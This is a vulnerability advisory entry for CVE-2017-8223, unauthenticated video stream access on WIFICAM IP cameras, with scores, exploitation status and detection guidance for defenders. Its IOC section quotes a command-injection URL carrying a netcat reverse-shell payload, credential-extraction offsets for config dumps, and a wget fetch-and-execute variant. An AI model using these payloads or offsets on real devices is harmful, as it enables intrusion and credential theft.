CVE-2017-8223
Published 2017-04-25
Priority P178 high · 7.5 CVSS 3.0
AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:N / A:N
ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 4.30% (89.9th percentile)
On Wireless IP Camera (P2P) WIFICAM devices, an attacker can use the RTSP server on port 10554/tcp to watch the streaming without authentication via tcp/av0_1 or tcp/av0_0.
Detection & IOCs (extracted from sources)
url: /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc%20192.168.1.1+1337%20-e/bin/sh)&dir=/&mode=PORT&upload_interval=0
bytes: 0x0a 0x0a 0x0a 0x0a 0x01
- Detect unauthenticated RTSP stream access on port 10554/tcp using RTSP paths av0_0 or av0_1 — no authentication challenge is issued by the device
- Alert on HTTP GET requests to /set_ftp.cgi or /ftptest.cgi containing shell metacharacters (e.g., $(), nc, wget) in the 'pwd' parameter — this is the command injection vector
- Credentials are stored in binary config dump with a recognisable 4-byte marker (0x0a 0x0a 0x0a 0x0a 0x01); credential extraction offsets +138 (username) and +170 (password) from this marker
- The exploit targets port 80/tcp (CAM_PORT) for the HTTP command injection stage; monitor for sequential GET requests to /set_ftp.cgi followed by /ftptest.cgi from the same source IP
- Two alternative payload variants exist for the FTP pwd injection: one using '+' instead of '%20' for spaces, and one using wget to fetch and execute a remote binary — detections must cover both encoding styles
CVSS provenance
nvd · v3.0 · 7.5 HIGH · CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvd · v2.0 · 5.0 MEDIUM · AV:N/AC:L/Au:N/C:P/I:N/A:N
vulncheck · 7.5 HIGH
GHSA
GHSA-544q-3wwf-w964: On Wireless IP Camera (P2P) WIFICAM devices, an attacker can use the RTSP server on port 10554/tcp to watch the streaming without authentication via t
ghsa_unreviewed·2022-05-17
CVE-2017-8223 [HIGH] CWE-287 GHSA-544q-3wwf-w964: On Wireless IP Camera (P2P) WIFICAM devices, an attacker can use the RTSP server on port 10554/tcp to watch the streaming without authentication via t
VulnCheck
wificam wireless_ip_camera_\(p2p\)_firmware Improper Authentication
vulncheck·2017·CVSS 7.5
CVE-2017-8223 [HIGH] wificam wireless_ip_camera_\(p2p\)_firmware Improper Authentication
Affected: wificam wireless_ip_camera_\(p2p\)_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.researchgate.net/publication/348602660_An_analysis_of_the_use_of_CVEs_by_IoT_malware